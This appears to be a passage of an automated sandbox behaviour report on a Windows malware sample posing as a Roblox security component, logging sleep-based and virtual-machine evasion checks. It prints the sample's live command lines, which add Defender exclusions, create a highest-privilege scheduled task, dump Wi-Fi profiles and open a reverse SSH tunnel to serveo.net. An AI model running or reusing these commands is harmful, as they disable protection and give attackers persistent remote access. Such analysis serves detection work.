Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -598656s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -598546s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -598437s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -598328s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -598218s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -598107s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -597970s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -597844s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -597734s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -597625s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -597515s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -597406s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -597297s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -597187s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -597077s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -596953s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -596843s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -596734s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -596625s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -596515s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -596406s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -596297s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -596187s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -596078s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -595969s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -582622s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5052	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 7432	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7732	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 128812	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 328804	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 491792	Thread sleep time: -922337203685477s >= -30000s

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Last function: Thread delayed
Source: C:\Windows\System32\OpenSSH\ssh.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\OpenSSH\ssh.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597665	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599655
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599107
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598546
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598437
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598218
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598107
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597970
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597844
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597625
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597515
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597406
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597297
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597187
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597077
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596953
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596843
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596625
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596515
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596297
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596187
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596078
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595969
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 582622
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477

Source: Amcache.hve.41.dr	Binary or memory string: VMware
Source: Amcache.hve.41.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.41.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.41.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.41.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.41.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: vkefq4cv.oil.exe, 00000012.00000002.2063310153.0000010DD583F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
Source: Amcache.hve.41.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.41.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: vkefq4cv.oil.exe, 0000002A.00000002.2314304033.0000017A7149E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.41.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.41.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.41.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.41.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: jqOHOuPMJP.exe, 00000000.00000002.1797186606.0000000000FB0000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4115442750.000001B8A9D61000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B798EF000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2314304033.0000017A7149E000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3543453931.00000167CFE24000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ssh.exe, 00000021.00000002.4113726250.00000292607CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
Source: Amcache.hve.41.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.41.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.41.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.41.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: jqOHOuPMJP.exe, 00000000.00000002.1817862177.0000000003DAA000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000000.1791180656.000001F995EB2000.00000002.00000001.01000000.00000008.sdmp, vkefq4cv.oil.exe.0.dr, vkefq4cv.oil.exe.4.dr	Binary or memory string: qemu'H
Source: Amcache.hve.41.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.41.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.41.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.41.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.41.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.41.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.41.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.41.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.41.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.41.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.41.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.41.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: vkefq4cv.oil.exe, 0000002C.00000002.3000161085.000001EC7F363000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^
Source: Amcache.hve.41.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process queried: DebugPort

Enables debug privileges

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 3	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
